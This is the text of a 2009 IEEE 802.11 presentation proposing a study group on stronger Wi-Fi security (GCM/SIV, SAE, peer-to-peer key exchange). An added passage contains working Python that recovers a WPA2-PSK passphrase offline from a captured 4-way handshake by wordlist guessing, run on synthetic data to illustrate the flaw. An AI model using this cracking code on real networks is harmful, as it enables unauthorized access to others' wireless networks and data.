A Study Group for Enhanced 802.11 Security
Authors: Dan Harkins, Aruba Networks
Date: 2009-03-13

Abstract
This presentation makes the case for formation of a Study Group on Enhanced Security for 802.11.
802.11 Security is Not Complete
• Enterprise security is there, but we have failed to provide technology to secure other use cases.
• Attacks against known flaws generate bad press for 802.11.
• Today a deployment is either simple or secure, but not both.
• Updates to 802.11 security are needed:
  • Faster and more efficient algorithms.
  • Enhancements to prevent known and published attacks: allow passwords to be used securely.
  • Improvements to support more usable, robust and secure 802.11 networks.
• There is a market for deployments that are problematic today:
  • No 802.1X, no centralized AAA server.
  • Easy to configure, easy to deploy, robust, and still secure.
  • Secure password-based authentication.
What is the Problem?
• New authenticated-encryption modes have been designed that improve on CCM, the mode 802.11 uses today:
  • GCM: parallelizable, so higher throughput and lower power consumption than CCM (NIST SP 800-38D).
  • SIV: misuse-resistant (reusing a nonce reveals only whether two messages are identical, never plaintext or forgeability) and more generally useful than CCM (RFC 5297).
• Strong security is only possible with 802.1X, but that is not appropriate for all use cases and is complex to deploy.
• Passwords are easy to use, but 802.11 does not define how to use them securely: the RSN pre-shared key is derived directly from the passphrase, so anyone who captures a 4-way handshake can test passphrase guesses offline.
• There is a market for peer-to-peer applications, but 802.1X is a pure client/server protocol.
• Other organizations want to address these shortcomings, but their attempts are complicated, insecure, or both.
• At least one feature in 802.11 needs security, but no existing Task Group has the scope to take on that work.
• IEEE 802.11 has no way to add small featurettes such as these to the standard.
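The weakness behind "802.11 does not define how to use them securely" (and behind the later slide's remark that RSN PSK is not resistant to attack), shown as an added worked example that is mine, not the presentation's: in WPA2-PSK the PMK is PBKDF2 of the passphrase and SSID, the KCK is derived from the PMK plus the two MAC addresses and two nonces, and message 2 of the 4-way handshake carries a MIC under that KCK. Every input except the passphrase is sent in the clear, so an eavesdropper can test candidate passphrases offline at PBKDF2 speed with no further contact with the AP. The SSID, MAC addresses, nonces and EAPOL-Key frame below are constructed for the example; the PBKDF2, PRF-512 and HMAC-SHA1-128 MIC constructions follow 802.11i.

```python
# Added example, not from the presentation: why the RSN pre-shared key
# (WPA2-PSK) gives an eavesdropper an offline password-guessing attack.
# Everything here is constructed in-script: the SSID, MAC addresses, nonces
# and EAPOL-Key frame are synthetic, not taken from a real capture.
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """802.11i PSK mapping: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def derive_kck(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)); KCK = PTK[0:16]."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, frame_with_zero_mic):
    """Key descriptor version 2 (CCMP): MIC = HMAC-SHA1 over the EAPOL-Key frame, truncated to 128 bits."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


# Byte offset of the MIC field: EAPOL header (4) + descriptor type (1) + key info (2)
# + key length (2) + replay counter (8) + nonce (32) + IV (16) + RSC (8) + key ID (8).
MIC_OFFSET = 81


def build_msg2(snonce, key_data):
    """Synthetic EAPOL-Key message 2 (supplicant -> AP) with the MIC field zeroed."""
    body = (b"\x02"                  # descriptor type: RSN key descriptor
            + b"\x01\x0a"            # key info: MIC bit, pairwise, descriptor version 2
            + b"\x00\x10"            # key length: 16 (CCMP)
            + b"\x00" * 7 + b"\x01"  # replay counter
            + snonce
            + b"\x00" * 16           # key IV
            + b"\x00" * 8            # key RSC
            + b"\x00" * 8            # key ID
            + b"\x00" * 16           # MIC (zero while it is being computed)
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # EAPOL v2, type 3 = EAPOL-Key


# Constructed network parameters (synthetic, for the example only).
SSID = "corp-guest"
AA = bytes.fromhex("001122334455")   # authenticator (AP) MAC
SPA = bytes.fromhex("66778899aabb")  # supplicant (STA) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP group/pairwise, PSK AKM


def capture_msg2(passphrase):
    """Plays the legitimate supplicant; returns message 2 as a sniffer would see it on the air."""
    frame = bytearray(build_msg2(SNONCE, RSN_IE))
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return bytes(frame)


def crack(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Offline guessing: everything the MIC depends on is public except the passphrase,
    so each candidate is checked locally, with no further traffic to the AP."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + b"\x00" * 16 + msg2[MIC_OFFSET + 16:]
    for cand in wordlist:
        kck = derive_kck(pmk_from_passphrase(cand, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return cand
    return None


def demo(wordlist=("letmein", "Password1", "summer2009", "correcthorse")):
    """Capture one handshake from a network whose passphrase is 'summer2009', then guess offline."""
    msg2 = capture_msg2("summer2009")
    return crack(SSID, AA, SPA, ANONCE, SNONCE, msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The point is not the 4096 PBKDF2 iterations, which only slow the attacker down linearly; it is that the protocol hands a passive listener a verifier for the password. A password-authenticated key exchange such as the SAE referenced on the Solution slide removes that verifier: an active attacker gets at most one guess per protocol run, and a passive one gets nothing to test against.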
What's the Solution?
• A Study Group to define a PAR and 5C for a new Task Group that will address these issues:
  • Define how GCM and SIV are used to protect an 802.11 frame.
  • Define how the secure password-authenticated key exchange from TGs (SAE, from the 802.11s mesh work) is used more generally in 802.11: for ESS, IBSS, mesh, and any other peer-to-peer application.
  • Develop a peer-to-peer variant of an existing certificate-based key exchange (e.g. DHKE-1) that is appropriate for ESS, IBSS, mesh, and any other peer-to-peer application.
  • Address the security of TGv's location service.
• Most of this has already been developed; it just needs to be defined for 802.11.
• A constrained scope would ensure timely results.
What's the Benefit and Why Should I Care?
• Network deployment can be simple yet secure if:
  • Passwords are used with a protocol implementing a zero-knowledge proof (a password-authenticated key exchange). An attacker gets at most one password guess per protocol run and nothing to test offline, which is exactly where RSN PSK fails.
  • Authentication is done using authentication frames!
  • Protocols are specified in a peer-to-peer fashion.
  • STAs can authenticate each other directly; no AAA needed!
• Less power consumption means longer battery life, and it's green.
• 802.11 will be applicable to more use cases while still providing strong security. This improves the end-user and customer experience with 802.11 gear, which can result in better and wider deployments of 802.11 and benefits us all!
References
• NIST SP 800-38D, Recommendation for Block Cipher Modes of Operation: Galois/Counter Mode (GCM) and GMAC.
• P. Rogaway and T. Shrimpton, "Deterministic Authenticated Encryption: A Provable-Security Treatment of the Key-Wrap Problem", Advances in Cryptology, EUROCRYPT 2006, St. Petersburg, Russia, 2006.
• RFC 5297, Synthetic Initialization Vector (SIV) Authenticated Encryption Using the Advanced Encryption Standard (AES).
• D. Harkins, "Simultaneous Authentication of Equals: A Secure, Password-Based Key Exchange for Mesh Networks", Proceedings of the 2008 Second International Conference on Sensor Technologies and Applications (SENSORCOMM), Cap Esterel, France, 2008.
• V. Shoup, "On Formal Models for Secure Key Exchange", ACM Computer and Communications Security Conference, 1999.